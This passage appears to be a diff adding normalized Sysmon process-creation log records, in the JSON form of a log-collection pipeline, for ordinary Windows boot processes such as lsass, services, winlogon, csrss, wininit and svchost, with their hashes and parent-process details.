AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p -s PlugPlay", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-00105b6c0000", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "732", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.555Z", "type": "raw", "uuid": "a0915c30-6be9-439a-af1c-b2bcad1f847f"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:24.0541859Z\"},\"EventRecordID\":\"27393\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.341\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001075590000}\"},{\"Name\":\"ProcessId\",\"text\":\"616\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Local Security Authority Process\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"lsass.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0FB26350106C9BDD196D4E7D01EB30007663687C,MD5=568C5CBF9877F6B9E39D1E7CA0FF0A36,SHA256=BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F,IMPHASH=09FDE88C65E2BC5F1F90E96B673C52B1\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010904d0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"468\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wininit.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"wininit.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\lsass.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-001075590000", "object.process.hash.imphash": "09FDE88C65E2BC5F1F90E96B673C52B1", "object.process.hash.md5": 
"568C5CBF9877F6B9E39D1E7CA0FF0A36", "object.process.hash.sha1": "0FB26350106C9BDD196D4E7D01EB30007663687C", "object.process.hash.sha256": "BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F", "object.process.id": "616", "object.process.meta": "Description:Local Security Authority Process | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "lsass.exe", "object.process.original_name": "lsass.exe", "object.process.parent.cmdline": "wininit.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\wininit.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010904d0000", "object.process.parent.id": "468", "object.process.parent.name": "wininit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.341Z", "type": "raw", "uuid": "81830ca8-18c5-4475-af8a-3d934ff5fccb"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:24.0496887Z\"},\"EventRecordID\":\"27390\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.295\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ProcessId\",\"text\":\"584\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1075 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Services and Controller app\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"services.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=617A0A0BAAB180541DB739C4A6851D784943C317,MD5=DB896369FB58241ADF28515E3765C514,SHA256=A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC,IMPHASH=7D2820FC8CAF521DC2058168B480D204\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010904d0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"468\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wininit.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"wininit.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\services.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.hash.imphash": "7D2820FC8CAF521DC2058168B480D204", 
"object.process.hash.md5": "DB896369FB58241ADF28515E3765C514", "object.process.hash.sha1": "617A0A0BAAB180541DB739C4A6851D784943C317", "object.process.hash.sha256": "A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC", "object.process.id": "584", "object.process.meta": "Description:Services and Controller app | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "services.exe", "object.process.original_name": "services.exe", "object.process.parent.cmdline": "wininit.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\wininit.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010904d0000", "object.process.parent.id": "468", "object.process.parent.name": "wininit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1075 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.295Z", "type": "raw", "uuid": "46902b14-015c-4394-9641-13ed346157c9"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:23.8762823Z\"},\"EventRecordID\":\"27388\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.240\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001096530000}\"},{\"Name\":\"ProcessId\",\"text\":\"568\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1075 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Logon Application\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"WINLOGON.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"winlogon.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=573ED5AED255DCEC948BCEA8C28EC9F3802A2E64,MD5=E8B1A6B8C6EA5972C123A816DF237AF8,SHA256=290C8C4B387B669B3988938D0083AA4B210365FB0855EAE010F49062A9DDEB04,IMPHASH=A5F3EBEF8618DCA7C7ACCF623BABBB86\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010794d0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"460\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000d8 00000084 \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "winlogon.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\winlogon.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-001096530000", "object.process.hash.imphash": "A5F3EBEF8618DCA7C7ACCF623BABBB86", 
"object.process.hash.md5": "E8B1A6B8C6EA5972C123A816DF237AF8", "object.process.hash.sha1": "573ED5AED255DCEC948BCEA8C28EC9F3802A2E64", "object.process.hash.sha256": "290C8C4B387B669B3988938D0083AA4B210365FB0855EAE010F49062A9DDEB04", "object.process.id": "568", "object.process.meta": "Description:Windows Logon Application | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "winlogon.exe", "object.process.original_name": "WINLOGON.EXE", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe 000000d8 00000084", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010794d0000", "object.process.parent.id": "460", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1075 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.240Z", "type": "raw", "uuid": "7e40c8f1-951d-4570-ad62-dfab2746be9f"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:23.2245281Z\"},\"EventRecordID\":\"27385\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.143\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010714e0000}\"},{\"Name\":\"ProcessId\",\"text\":\"476\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\csrss.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Client Server Runtime Process\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"CSRSS.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"%%SystemRoot%%\\\\system32\\\\csrss.exe ObjectDirectory=\\\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=779B8AFC3FA2528B090F400EF3D592E0E2775955,MD5=7D64128BC1EECE41196858897596EBC8,SHA256=FB40ED0FFA6BC795923A941DAB6B7D6B43583D0F152A6DF4D8953D2C1A0CB417,IMPHASH=A96FA9912E09E361274AD77F1A4B252C\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010794d0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"460\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000d8 00000084 \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "%%SystemRoot%%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16", 
"object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\csrss.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010714e0000", "object.process.hash.imphash": "A96FA9912E09E361274AD77F1A4B252C", "object.process.hash.md5": "7D64128BC1EECE41196858897596EBC8", "object.process.hash.sha1": "779B8AFC3FA2528B090F400EF3D592E0E2775955", "object.process.hash.sha256": "FB40ED0FFA6BC795923A941DAB6B7D6B43583D0F152A6DF4D8953D2C1A0CB417", "object.process.id": "476", "object.process.meta": "Description:Client Server Runtime Process | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "csrss.exe", "object.process.original_name": "CSRSS.Exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe 000000d8 00000084", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010794d0000", "object.process.parent.id": "460", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.143Z", "type": "raw", "uuid": "83ca66eb-bd74-476d-9ad0-a4c45f93e864"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:23.2225195Z\"},\"EventRecordID\":\"27383\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.130\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010904d0000}\"},{\"Name\":\"ProcessId\",\"text\":\"468\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\wininit.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Start-Up Application\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"WinInit.exe\"},{\"Name\":\"CommandLine\",\"text\":\"wininit.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=389E257A924EA521E830C31712494D33B38841A8,MD5=4E20895E641F2C3E68AB3DB91A1A16F1,SHA256=13AD43EE6D19DFC9709C3106D796BC3F21791A564E443D042A5AA117F2680649,IMPHASH=C2F90ACB28AF147D0D0C3408B9EE38C5\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b763-5ea4-0000-00106a480000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"388\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000cc 00000084 \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "wininit.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\wininit.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010904d0000", "object.process.hash.imphash": "C2F90ACB28AF147D0D0C3408B9EE38C5", 
"object.process.hash.md5": "4E20895E641F2C3E68AB3DB91A1A16F1", "object.process.hash.sha1": "389E257A924EA521E830C31712494D33B38841A8", "object.process.hash.sha256": "13AD43EE6D19DFC9709C3106D796BC3F21791A564E443D042A5AA117F2680649", "object.process.id": "468", "object.process.meta": "Description:Windows Start-Up Application | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "wininit.exe", "object.process.original_name": "WinInit.exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe 000000cc 00000084", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b763-5ea4-0000-00106a480000", "object.process.parent.id": "388", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": 